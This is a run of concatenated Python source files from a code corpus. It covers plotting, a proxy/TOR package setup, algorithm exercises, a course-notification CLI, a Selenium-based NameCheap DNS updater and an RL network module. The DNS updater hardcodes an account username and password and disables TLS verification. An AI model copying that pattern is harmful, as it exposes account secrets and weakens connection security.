'y'],\n order=['common', 'trending', 'medical'],\n data=melted[melted['y-axis'] == LH_AF_MG], kind=\"bar\",\n height=2.5, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/LH_AF_catplot.png', dpi=300)\n\n\n#results_df[['device', 'queries', 'search_engine', 'inc_rate', 'matches']]\n\n\n# %%\n# differences between search engines\nresults_df.groupby(['device', 
'queries']).agg(lambda x: max(x) - min(x))['inc_rate']\n\n#%%\n# differences between devices\nresults_df.groupby(['search_engine', 'queries']).agg(lambda x: max(x) - min(x))['inc_rate']\n\n#%%\n# diff between FP and AF\nmelted[\n    (melted['y-axis'] == FP) | (melted['y-axis'] == AF_MG)\n].groupby(['Device', 'Query Category', 'Search Engine']).agg(lambda x: max(x) - min(x))\n\n# %%\nse_minus_se = {}\nse_to_matches = {}\nsub = results_df[(results_df.device == 'mobile') & (results_df.queries == 'top')]\nfor i, row in sub.iterrows():\n    se_to_matches[row.search_engine] = set(row.matches)\nse_to_matches\nfor k1, v1 in se_to_matches.items():\n    for k2, v2 in se_to_matches.items():\n        if k1 == k2:\n            continue\n        # what's in the first but not in the second\n        se_minus_se[f'{k1}_{k2}'] = v1 - v2\n\n#%%\npprint(se_minus_se)\n\n\n# %%\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":20132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"651798420","text":"import setuptools\n\n\npackage = dict(\n    name             = 'proxy',\n    version          = '0.1.0',\n    author           = 'Dan Gittik',\n    author_email     = 'dan.gittik@gmail.com',\n    description      = 'Context managers to route Python via proxies and TOR',\n    license          = 'MIT',\n    url              = 'https://github.com/dan-gittik/proxy',\n    packages         = setuptools.find_packages(),\n    install_requires = [\n        'pysocks',\n        'stem',\n    ],\n    tests_require = [\n        'pytest',\n        'requests',\n    ],\n)\n\n\nif __name__ == '__main__':\n    setuptools.setup(**package)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"638093523","text":"def mode(nums):\n    \"\"\"Return most-common number in list.\n\n    For this function, there will always be a single-most-common value;\n    you do not need to worry about handling cases where more than one item\n    occurs the same number of times.\n\n    >>> mode([1, 2, 1])\n    1\n\n    >>> mode([2, 2, 3, 3, 2])\n    2\n    \"\"\"\n    # Alternative sketch: count each distinct value directly, e.g.\n    # max(set(nums), key=nums.count)\n\n    nums.sort()\n    biggest_count = 0\n    curr_count = 0\n    mode = None\n    last_n = nums[0]\n\n    for n in nums:\n        if n == last_n:\n            curr_count += 1\n        else:\n            # a new run starts: reset the counter and remember the new value\n            last_n = n\n            curr_count = 1\n        if biggest_count < curr_count:\n            biggest_count = curr_count\n            mode = n\n    return mode","sub_path":"17_mode/mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"266634695","text":"# APPROACH 1: TWO POINTERS\n# Time Complexity : O(n + m), n: len(forwardRouteList), m: len(returnRouteList)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : N/A\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. two pointers -> low at beginning of forward list and high at end of return list.\n# 2. Each time take the sum of the distances and, if within the limit, check whether it is greater than the max distance found so far.\n# 3. If greater than the max distance found so far, discard the previous results and form a new one. If equal to the max distance found so far, append to the current result.\n# 4. If the current sum is greater than the limit, decrement high; if it is less than the limit, increment low.
\ndef getOptimizedUtilize(maxTravelDist, forwardRouteList, returnRouteList):\n    if forwardRouteList is None or returnRouteList is None:\n        return None\n\n    low, high, max_so_far, result = 0, len(returnRouteList) - 1, float('-inf'), []\n    while low < len(forwardRouteList) and high >= 0:\n        curr_sum = forwardRouteList[low][1] + returnRouteList[high][1]\n        if curr_sum <= maxTravelDist:\n            if curr_sum > max_so_far:\n                max_so_far = curr_sum\n                result = [[forwardRouteList[low][0], returnRouteList[high][0]]]\n            elif curr_sum == max_so_far:\n                result.append([forwardRouteList[low][0], returnRouteList[high][0]])\n\n            low += 1\n\n        else:\n            high -= 1\n\n    return result\n\n\n\n# APPROACH 2: BINARY SEARCH\n# Time Complexity : O(n lg m), n: len(shorter route list) and m: len(longer route list)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : N/A\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Ensure that forwardRouteList is the shorter of the two lists\n# 2. For each element of forwardRouteList, the target is (max allowed distance - element); binary-search returnRouteList for the closest value <= target, not an exact match\n# 3. Keep track of the global max found so far, to update the result appropriately\n# 4. If the element is greater than the target, move to the left half, else to the right half\n\ndef getOptimizedUtilize(maxTravelDist, forwardRouteList, returnRouteList):\n    if forwardRouteList is None or returnRouteList is None:\n        return None\n\n    if len(forwardRouteList) > len(returnRouteList):\n        # the recursive call's result was previously discarded; return it\n        # (note: the id pairs come back in swapped order in this case)\n        return getOptimizedUtilize(maxTravelDist, returnRouteList, forwardRouteList)\n\n    result, max_so_far = [], float('-inf')\n    for route in forwardRouteList:\n        target = maxTravelDist - route[1]\n        low, high = 0, len(returnRouteList) - 1\n\n        while low <= high:\n            mid = low + (high - low) // 2\n\n            if returnRouteList[mid][1] <= target:\n                # compare against the actual candidate sum, not target + route[1]\n                # (which always equals maxTravelDist)\n                curr_sum = returnRouteList[mid][1] + route[1]\n                if curr_sum > max_so_far:\n                    max_so_far = curr_sum\n                    result = [[route[0], returnRouteList[mid][0]]]\n                elif curr_sum == max_so_far:\n                    result.append([route[0], returnRouteList[mid][0]])\n                low = mid + 1\n\n            else:\n                high = mid - 1\n\n    return result\n","sub_path":"Problem-3_Optimized_air_routes.py","file_name":"Problem-3_Optimized_air_routes.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"79637139","text":"import logging\nfrom argparse import ArgumentParser\nfrom datetime import datetime\n\nfrom cn_v2.manager import WatcherManager, CourseManager\n\nterm_code = {\"DA\": \"202142\", \"FH\": \"202141\"}\n\narg_parser = ArgumentParser(description=\"Course Notify Manager\")\n\narg_parser.add_argument(\"--log_file\",\n                        help=\"Path to log file\",\n                        required=False)\n\narg_parser.add_argument(\"--config_file\",\n                        help=\"Path to configuration file\",\n                        required=True)\n\narg_parser.add_argument(\"--school\",\n                        choices=[\"DA\", \"FH\"],\n                        help=\"Which school to manage\",\n                        required=True)\n\narg_parser.add_argument(\"-c\", \"--update_course\",\n                        help=\"Update all course data\",\n                        action=\"store_true\")\n\narg_parser.add_argument(\"-s\", \"--update_seats\",\n                        help=\"Update seats data only\",\n                        action=\"store_true\")\n\narg_parser.add_argument(\"-n\", \"--send_notification\",\n                        help=\"Send notification email to watchers\",\n                        action=\"store_true\")\n\narg_parser.add_argument(\"-v\", \"--verbose\",\n                        help=\"Verbose\",\n                        action=\"store_true\")\n\nargs = arg_parser.parse_args()\n\n\ndef print_error(msg):\n    print(\"[ERROR] \" + msg)\n\n\ndef create_logger():\n    logger = logging.getLogger(\"CourseNotify Logger\")\n    formatter = logging.Formatter(\"[%(levelname)s][%(asctime)s][%(name)s] - %(message)s\")\n\n    fh = logging.FileHandler(args.log_file)\n    fh.setFormatter(formatter)\n    fh.setLevel(logging.INFO)\n\n    logger.addHandler(fh)\n    logger.setLevel(logging.INFO)\n    return logger\n\n\ncourse_manager = CourseManager(school=args.school, config_file=args.config_file, term_code=term_code)\nwatcher_manager = WatcherManager(school=args.school, config_file=args.config_file)\n\n\ndef update_course():\n    course_manager.update_course_collection()\n\n\ndef update_seats():\n    # NOTE: the manager used here exposes no seats-only call in this script, so\n    # this currently performs the same full update as update_course()\n    course_manager.update_course_collection()\n\n\ndef send_notification():\n    watcher_manager.notify_all()\n\n\nif args.update_course:\n    update_course()\nif args.update_seats:\n    update_seats()\nif args.send_notification:\n    send_notification()\n","sub_path":"script/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
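# Added usage note (illustrative; the file names and flag combination below are hypothetical):\n# the manage.py script above is driven entirely by its argparse flags, e.g.\n#\n#     python manage.py --config_file config.yaml --school DA --log_file manage.log -c -n\n#\n# which refreshes the course collection (-c) and then emails the watchers (-n).\n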
{"seq_id":"525489328","text":"import ipgetter\nfrom notify import sms_and_log\nimport weakref\nfrom webdriver import Browser\nfrom time import sleep\n\n# these three are used below but were missing from the original imports\nimport logging\nimport re\n\nimport requests\n\nclass Domain(object):\n    '''Parent class for domains.\n\n    Note:\n        Having this class to inherit from allows for easily expanding this program\n        to incorporate other domain services.\n\n    Args:\n        domain (str): A domain name.\n        https (bool): If set true, https will be tested for the domain.\n\n    Attributes:\n        domain (str): Name of the domain associated with the object.\n        port (int): Port number to test for connection.\n        domain_url (str): Url of the domain.\n\n    '''\n\n    _instances = []\n    def __init__(self, domain, https=False):\n\n        self.domain = domain\n        self.https = https\n        if not https:\n            self.port = 80\n            self.domain_url = 'http://' + self.domain\n        else:\n            self.port = 443\n            self.domain_url = 'https://www.' + self.domain\n        self.__class__._instances.append(weakref.proxy(self))\n\n    @property\n    def reachable(self):\n        '''Returns:\n            (bool): True if the domain is reachable and responds with a 200 status code,\n            False otherwise.\n        '''\n        try:\n            # the instance attribute is domain_url; self.url would pick up the\n            # NameCheap login page on subclass instances\n            r = requests.get(self.domain_url, timeout=2, verify=False)\n            if r.status_code == 200:\n                return True\n        except requests.exceptions.ConnectionError as e:\n            logging.warning(str(e))\n        return False\n\n\nclass NameCheap(Domain):\n    '''Class for domains registered with NameCheap.com\n    \n    Args:\n        password (str): Password to namecheap account.\n        username (str): Username to namecheap account.\n\n    Attributes:\n        instances (list): Contains every instance of this class.\n\n    '''\n    instances = []\n    password = 'MyDomainPass614'\n    username = 'andrewrowden'\n    url = \"https://www.namecheap.com/myaccount/login.aspx?ReturnUrl=%2f\"\n    def __init__(self, domain, https=False):\n\n        super(NameCheap, self).__init__(domain, https)\n        self.__class__.instances.append(weakref.proxy(self))\n\n\ndef update_dns(new_ip):\n    '''Updates the IP address for every instance of the NameCheap class.\n    Args:\n        new_ip (str): The new IP address dns should resolve to.\n    '''\n    with Browser(NameCheap.url) as web:\n        url = NameCheap.url\n        web.driver.get(url)\n        sleep(15)\n        userName = web.driver.find_element_by_class_name('nc_username')\n        userName.send_keys(NameCheap.username)\n        passWord = web.driver.find_element_by_class_name('nc_password')\n        passWord.send_keys(NameCheap.password)\n        web.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n        sleep(15)\n        for obj in NameCheap.instances:\n            url = 'https://ap.www.namecheap.com/Domains/DomainControlPanel/%s/advancedns' % obj.domain\n            web.driver.get(url)\n            sleep(25)\n            possibleLinks = web.driver.find_elements_by_css_selector('p')\n            IPLink = find_IP_link(possibleLinks)\n            IPLink.click()\n            sleep(15)\n            inputArea = web.driver.find_element_by_name('idAddress')\n            inputArea.clear()\n            inputArea.send_keys(new_ip)\n            web.driver.find_element_by_class_name('save').click()\n\n\ndef find_IP_link(possible_links):\n    '''Searches objects to find one with an IP address.\n    Args:\n        possible_links (webdriver objects): A list of objects with a text attribute.\n    Returns:\n        (webdriver object): Contains an IP address.\n    '''\n    isIP = re.compile(\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\")\n    for input_box in possible_links:\n        value = input_box.text\n        IP = isIP.match(value)\n        if IP:\n            return input_box\n","sub_path":"dynamicIP.py","file_name":"dynamicIP.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"239855558","text":"evens1 = [2, 1, 2, 3, 4]\r\nevens2 = [2, 2, 0]\r\nevens3 = [1, 3, 5]\r\n\r\n# the counters must start at zero, and the original '=+1' assigned +1 instead of incrementing\r\ncount_even1 = 0\r\ncount_even2 = 0\r\ncount_even3 = 0\r\n\r\nfor num in evens1:\r\n    if num % 2 == 0:\r\n        count_even1 += 1\r\n\r\nfor num in evens2:\r\n    if num % 2 == 0:\r\n        count_even2 += 1\r\n\r\nfor num in evens3:\r\n    if num % 2 == 0:\r\n        count_even3 += 1\r\n\r\n\r\nprint(\"Even numbers in the list\", count_even1)\r\nprint(\"Even numbers in the list\", count_even2)\r\nprint(\"Even numbers in the list\", count_even3)","sub_path":"Yeet/Archive/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"91699659","text":"import tensorflow as tf\n\nfrom utility.tf_utils import assert_rank\nfrom core.module import Ensemble\nfrom nn.func import Encoder, rnn\nfrom algo.iqn.nn import Quantile, Value\n\n\nclass 
RDQN(Ensemble):\n def __init__(self, config, env, **kwargs):\n super().__init__(\n model_fn=create_components, \n config=config,\n env=env,\n **kwargs)\n \n @tf.function\n def action(self, x, state, mask,\n prev_action=None, prev_reward=None,\n evaluation=False, epsilon=0,\n temp=1, return_stats=False,\n return_eval_stats=False):\n assert x.shape.ndims in (2, 4), x.shape\n\n x, state = self._encode(\n x, state, mask, prev_action, prev_reward)\n _, qt_embed = self.quantile(x)\n action = self.q.action(x, qt_embed, \n epsilon=epsilon, temp=temp, return_stats=return_stats)\n\n if evaluation:\n return tf.squeeze(action), state\n else:\n terms = {}\n action = tf.nest.map_structure(lambda x: tf.squeeze(x), action)\n if return_stats:\n action, terms = action\n terms.update({\n 'mu': self.q.compute_prob()\n })\n out = tf.nest.map_structure(lambda x: tf.squeeze(x), (action, terms))\n return out, state\n\n def _encode(self, x, state, mask, prev_action=None, prev_reward=None):\n x = tf.expand_dims(x, 1)\n mask = tf.expand_dims(mask, 1)\n x = self.encoder(x)\n if hasattr(self, 'rnn'):\n additional_rnn_input = self._process_additional_input(\n x, prev_action, prev_reward)\n x, state = self.rnn(x, state, mask, \n additional_input=additional_rnn_input)\n else:\n state = None\n x = tf.squeeze(x, 1)\n return x, state\n\n def _process_additional_input(self, x, prev_action, prev_reward):\n results = []\n if prev_action is not None:\n prev_action = tf.reshape(prev_action, (-1, 1))\n prev_action = tf.one_hot(prev_action, self.actor.action_dim, dtype=x.dtype)\n results.append(prev_action)\n if prev_reward is not None:\n prev_reward = tf.reshape(prev_reward, (-1, 1, 1))\n results.append(prev_reward)\n assert_rank(results, 3)\n return results\n\n def reset_states(self, states=None):\n if hasattr(self, 'rnn'):\n self.rnn.reset_states(states)\n\n def get_initial_state(self, inputs=None, batch_size=None, dtype=None):\n return self.rnn.get_initial_state(\n inputs, batch_size=batch_size, dtype=dtype) \\\n if hasattr(self, 'rnn') else None\n\n @property\n def state_size(self):\n return self.rnn.state_size if hasattr(self, 'rnn') else None\n \n @property\n def state_keys(self):\n return self.rnn.state_keys if hasattr(self, 'rnn') else ()\n\ndef create_components(config, env):\n action_dim = env.action_dim\n encoder_config = config['encoder']\n quantile_config = config['quantile']\n q_config = config['q']\n\n encoder_config['time_distributed'] = True\n model = dict(\n encoder=Encoder(encoder_config, name='encoder'),\n quantile=Quantile(quantile_config, name='phi'),\n q=Value(q_config, action_dim, name='q'),\n target_encoder=Encoder(encoder_config, name='target_encoder'),\n target_quantile=Quantile(quantile_config, name='target_phi'),\n target_q=Value(q_config, action_dim, name='target_q'),\n )\n if config.get('rnn'):\n rnn_config = config['rnn']\n model.update({\n 'rnn': rnn(rnn_config, name='rnn'),\n 'target_rnn': rnn(rnn_config, name='target_rnn')\n })\n\n return model\n\ndef create_model(config, env, **kwargs):\n return RDQN(config, env, **kwargs)\n","sub_path":"algo2/mriqn/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"91699659","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in 
compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\" This module contains tests for aea/aea_builder.py \"\"\"\nimport os\nimport re\nfrom pathlib import Path\n\nimport pytest\n\nfrom aea.aea_builder import AEABuilder\nfrom aea.configurations.base import ComponentType\nfrom aea.crypto.fetchai import FetchAICrypto\nfrom aea.exceptions import AEAException\n\nfrom .conftest import CUR_PATH, ROOT_DIR, skip_test_windows\n\n\nFETCHAI = FetchAICrypto.identifier\n\n\n@skip_test_windows\ndef test_default_timeout_for_agent():\n \"\"\"\n Tests agents loop sleep timeout\n set by AEABuilder.DEFAULT_AGENT_LOOP_TIMEOUT\n \"\"\"\n agent_name = \"MyAgent\"\n private_key_path = os.path.join(CUR_PATH, \"data\", \"fet_private_key.txt\")\n builder = AEABuilder()\n builder.set_name(agent_name)\n builder.add_private_key(FETCHAI, private_key_path)\n\n aea = builder.build()\n assert aea._timeout == builder.DEFAULT_AGENT_LOOP_TIMEOUT\n\n builder = AEABuilder()\n builder.set_name(agent_name)\n builder.add_private_key(FETCHAI, private_key_path)\n builder.set_timeout(100)\n\n aea = builder.build()\n assert aea._timeout == 100\n\n\ndef test_add_package_already_existing():\n \"\"\"\n Test the case when we try to add a package (already added) to the AEA builder.\n\n It should fail because the package is already present into the builder.\n \"\"\"\n builder = AEABuilder()\n fipa_package_path = Path(ROOT_DIR) / \"packages\" / \"fetchai\" / \"protocols\" / \"fipa\"\n builder.add_component(ComponentType.PROTOCOL, fipa_package_path)\n\n expected_message = re.escape(\n \"Component 'fetchai/fipa:0.2.0' of type 'protocol' already added.\"\n )\n with pytest.raises(AEAException, match=expected_message):\n builder.add_component(ComponentType.PROTOCOL, fipa_package_path)\n\n\ndef test_when_package_has_missing_dependency():\n \"\"\"\n Test the case when the builder tries to load the packages,\n but fails because of a missing dependency.\n \"\"\"\n builder = AEABuilder()\n expected_message = re.escape(\n \"Package 'fetchai/oef:0.3.0' of type 'connection' cannot be added. 
\"\n \"Missing dependencies: ['(protocol, fetchai/fipa:0.2.0)', '(protocol, fetchai/oef_search:0.1.0)']\"\n )\n with pytest.raises(AEAException, match=expected_message):\n # connection \"fetchai/oef:0.1.0\" requires\n # \"fetchai/oef_search:0.1.0\" and \"fetchai/fipa:0.2.0\" protocols.\n builder.add_component(\n ComponentType.CONNECTION,\n Path(ROOT_DIR) / \"packages\" / \"fetchai\" / \"connections\" / \"oef\",\n )\n","sub_path":"tests/test_aea_builder.py","file_name":"test_aea_builder.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"352328780","text":"\"\"\"\r\nModel coordinates and orientation\r\n\"\"\"\r\nimport math\r\n\r\nfrom Matrix import *\r\nfrom Vector import Vector3\r\n\r\nclass Coordinate:\r\n def __init__(self, rotation = Matrix3.identity(), translation = Vector3()):\r\n if isinstance(rotation, list):\r\n rotation = Matrix3(rotation)\r\n if isinstance(translation, list):\r\n translation = Vector3(translation[0], translation[1], translation[2])\r\n self.rotation = rotation\r\n self.translation = translation\r\n\r\n def matrix(self):\r\n return Matrix4([\\\r\n self.rotation[0][0], self.rotation[0][1], self.rotation[0][2], self.translation[0],\\\r\n self.rotation[1][0], self.rotation[1][1], self.rotation[1][2], self.translation[1],\\\r\n self.rotation[2][0], self.rotation[2][1], self.rotation[2][2], self.translation[2],\\\r\n 0, 0, 0, 1])\r\n\r\n def inverseMatrix(self):\r\n rotInv = self.rotation.transpose()\r\n trans = rotInv * (-self.translation)\r\n return Matrix4([\\\r\n rotInv[0][0], rotInv[0][1], rotInv[0][2], trans[0],\\\r\n rotInv[1][0], rotInv[1][1], rotInv[1][2], trans[1],\\\r\n rotInv[2][0], rotInv[2][1], rotInv[2][2], trans[2],\\\r\n 0, 0, 0, 1])\r\n\r\n def _computeWS(self, vector):\r\n v1 = self.rotation * vector\r\n v2 = v1 + self.translation\r\n return Vector3(v2.x, v2.y, v2.z)\r\n \r\n def toWorldSpace(self, vectors):\r\n if isinstance(vectors, list):\r\n for vector in vectors:\r\n if isinstance(vector, Vector.Vector3):\r\n self._computeWS(vector)\r\n elif isinstance(vectors, Vector.Vector3):\r\n self._computeWS(vectors)\r\n else:\r\n raise TypeError(\"not a supported type\")\r\n\r\n def _computeOS(self, vector):\r\n v1 = vector - self.translation\r\n v2 = self.rotation * v1\r\n return Vector3(v2.x, v2.y, v2.z)\r\n\r\n def toObjectSpace(self, vectors):\r\n if isinstance(vectors, list):\r\n for vector in vectors:\r\n if isinstance(vector, Vector.Vector3):\r\n self._computeOS(vector)\r\n elif isinstance(vectors, Vector.Vector3):\r\n self._computeOS(vectors)\r\n else:\r\n raise TypeError(\"not a supported type\")\r\n","sub_path":"branches/adaptare/trunk/hfall/Coordinate.py","file_name":"Coordinate.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"378761414","text":"from __future__ import absolute_import\nimport numpy\nfrom n2 import HnswIndex\nfrom ann_benchmarks.algorithms.base import BaseANN\n\nclass N2(BaseANN):\n def __init__(self, m):\n threads = 8\n self.name = 'N2(m={}, threads={})'.format(m,threads)\n self._m = m\n self._threads = threads\n self._index = None\n print(\"Init done\")\n\n def fit(self, X):\n X = numpy.array(X)\t\n X = X.astype(numpy.float32)\n self._index = HnswIndex(X.shape[1],\"L2\")\n print(\"Shape\", X.shape[1])\n for el in X:\n self._index.add_data(el) \n self._index.build(m=self._m, n_threads=self._threads)\n print(\"Fit done\")\n\n def 
query(self, v, n):\n v = v.astype(numpy.float32)\n #print(v)\n #print(n)\n #print(\"-----------------------------------\")\n nns = self._index.search_by_vector(v,n)\n #print(\"[search_by_vector]: Nearest neighborhoods of vector {}: {}\".format(v, nns))\n return nns\n def use_threads(self):\n return False\n \n","sub_path":"ann_benchmarks/algorithms/n2.py","file_name":"n2.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131558789","text":"from settings import SETTINGS\nimport uuid\n\ndef validate(S, varnames, GLOBAL):\n for name in varnames:\n val = S(name)\n if isinstance(val,str) and val.startswith(\"as \"):\n val = val[3:]\n newval = eval(val)\n S(name,set=newval)\n\n if S(\"activation.type\") != \"timerelu\" and S(\"activation.type\") != \"trsim\":\n if \"timerelu\" in SETTINGS:\n del SETTINGS[\"timerelu\"]\n\n dir = S(\"log.dir\")\n dirthis = dir.endswith(\"!\")\n print(dir, dirthis)\n if dirthis:\n dir = dir[:-1]\n if not dirthis and not S(\"debug\"):\n S(\"log.dir\",set=dir+\"_\"+str(uuid.uuid4()).split(\"-\")[0])\n else:\n S(\"log.dir\",set=dir)\n\n if isinstance(S(\"util.variable.transformation\"),str):\n transformation_template = S(\"util.variable.transformation\")\n S(\"util.variable.transformation\",set=S(\"util.variable.transformation_templates.\"+transformation_template))\n S(\"util.variable.transformation.template_name\",set=transformation_template)\n\n if \"transformation_templates\" in SETTINGS[\"util\"][\"variable\"]:\n GLOBAL[\"transformation_templates\"] = SETTINGS[\"util\"][\"variable\"][\"transformation_templates\"]\n del SETTINGS[\"util\"][\"variable\"][\"transformation_templates\"]\n\n if S(\"pruning.activate\") and S(\"util.tfl\") == \"tfl\":\n raise ValueError(\"Pruning is only possible for setting: util.variable.tfl == 'tfl_custom'\")\n\n if S(\"predict_patches\"):\n if S(\"batches.patches_size\") == 0:\n raise ValueError(\"For patch-prediction you need to specify patches. 
(batches.patches_size> 0)\")\n if S(\"batches.test_like_train\") == 0:\n raise ValueError(\"For patch-prediction you need use batches.test_like_train-mode\")\n","sub_path":"settings_validator.py","file_name":"settings_validator.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"594234472","text":"import random\n\ndef shiftBy(c, n):\n return chr(((ord(c) - ord('a') + n) % 26) + ord('a'))\n\ndef encode(raw, keyLength):\n key = [random.randint(1,25) for i in range(keyLength)]\n secret = \"\".join([shiftBy(raw[i], key[i % keyLength]) for i in range(len(raw))])\n withSpaces = ''\n for i in range(len(secret)):\n if i % 5 == 4:\n withSpaces = withSpaces + secret[i] + ' '\n else:\n withSpaces = withSpaces + secret[i]\n return withSpaces, key\n\nx = 0\nwhile x < 25: \n code,key = encode(\"hvwgw gqozz srobv wghcf wqozq wdvsf psqoi gswhw gpfcy sbhbl\", 3)\n print(code, key)\n x += 1","sub_path":"2021/Code/Python/UDEL/AppliedCrypto/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"365406354","text":"import argparse\nimport os\nfrom collections import OrderedDict\nimport sys\nimport time\n\nfrom aws_requests_auth.boto_utils import BotoAWSRequestsAuth\nimport requests\n\nparser = argparse.ArgumentParser(\n description=\"Helper script to upload files to S3 bucket\")\nparser.add_argument(\"--path\", type=str)\nparser.add_argument(\"--destination\", type=str)\nargs = parser.parse_args()\n\nassert os.path.exists(args.path)\nassert args.destination in {\"wheels\", \"containers\", \"logs\"}\nassert \"BUILDKITE_JOB_ID\" in os.environ\nassert \"BUILDKITE_COMMIT\" in os.environ\n\nis_dir = os.path.isdir(args.path)\n\nauth = BotoAWSRequestsAuth(\n aws_host=\"vop4ss7n22.execute-api.us-west-2.amazonaws.com\",\n aws_region=\"us-west-2\",\n aws_service=\"execute-api\",\n)\n\nfor _ in range(5):\n resp = requests.get(\n \"https://vop4ss7n22.execute-api.us-west-2.amazonaws.com/endpoint/\",\n auth=auth,\n params={\"job_id\": os.environ[\"BUILDKITE_JOB_ID\"]})\n print(\"Getting Presigned URL, status_code\", resp.status_code)\n if resp.status_code >= 500:\n print(\"errored, retrying...\")\n print(resp.text)\n time.sleep(5)\n else:\n break\nif resp.status_code >= 500:\n print(\"still errorred after many retries\")\n sys.exit(1)\n\nsha = os.environ[\"BUILDKITE_COMMIT\"]\nif is_dir:\n paths = [os.path.join(args.path, f) for f in os.listdir(args.path)]\nelse:\n paths = [args.path]\nprint(\"Planning to upload\", paths)\n\nfor path in paths:\n fn = os.path.split(path)[-1]\n if args.destination == \"wheels\":\n c = resp.json()[\"presigned_wheels\"]\n of = OrderedDict(c[\"fields\"])\n of[\"key\"] = f\"scratch/bk/{sha}/{fn}\"\n\n elif args.destination == \"containers\":\n c = resp.json()[\"presigned_containers\"]\n of = OrderedDict(c[\"fields\"])\n of[\"key\"] = f\"{sha}/{fn}\"\n\n elif args.destination == \"logs\":\n c = resp.json()[\"presigned_logs\"]\n of = OrderedDict(c[\"fields\"])\n branch = os.environ[\"BUILDKITE_BRANCH\"]\n bk_job_id = os.environ[\"BUILDKITE_JOB_ID\"]\n of[\"key\"] = f\"bazel_events/{branch}/{sha}/{bk_job_id}/{fn}\"\n\n else:\n raise ValueError(\"Unknown destination\")\n\n of[\"file\"] = open(path, \"rb\")\n r = requests.post(c[\"url\"], files=of)\n print(f\"Uploaded {path} to {of['key']}\", 
r.status_code)\n","sub_path":".buildkite/copy_files.py","file_name":"copy_files.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"60226081","text":"#!/usr/bin/env python\n\"\"\"\nCopyright 2012 Wordnik, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nclass TargetEmailRequest:\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\"\"\"\n\n\n def __init__(self):\n self.swaggerTypes = {\n 'dataFields': 'Map[string, object]',\n 'campaignId': 'long',\n 'inlineCss': 'bool',\n 'attachments': 'list[AttachmentEntry]',\n 'recipientEmail': 'str'\n\n }\n\n\n #Fields to merge into email template\n self.dataFields = None # Map[string, object]\n self.campaignId = None # long\n #Inline css to ensure proper rendering on gmail & outlook clients\n self.inlineCss = None # bool\n #Total attachment size limited to 10MB\n self.attachments = None # list[AttachmentEntry]\n self.recipientEmail = None # str\n \n","sub_path":"generated-code/client/iterable/python/models/TargetEmailRequest.py","file_name":"TargetEmailRequest.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"58505699","text":"#!/usr/bin/env python\n\nimport argparse\n\nparser = argparse.ArgumentParser(\"Program to display the velocity of the Janus nanomotor.\")\nparser.add_argument('file', type=str, help='H5MD datafile')\nparser.add_argument('--directed', action='store_true')\nparser.add_argument('--histogram', action='store_true')\nargs = parser.parse_args()\n\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\n\nwith h5py.File(args.file, 'r') as f:\n r = f['particles/janus/position/value'][...]\n r_dt = f['particles/janus/position/time'][()]\n im = f['particles/janus/image/value'][...]\n v 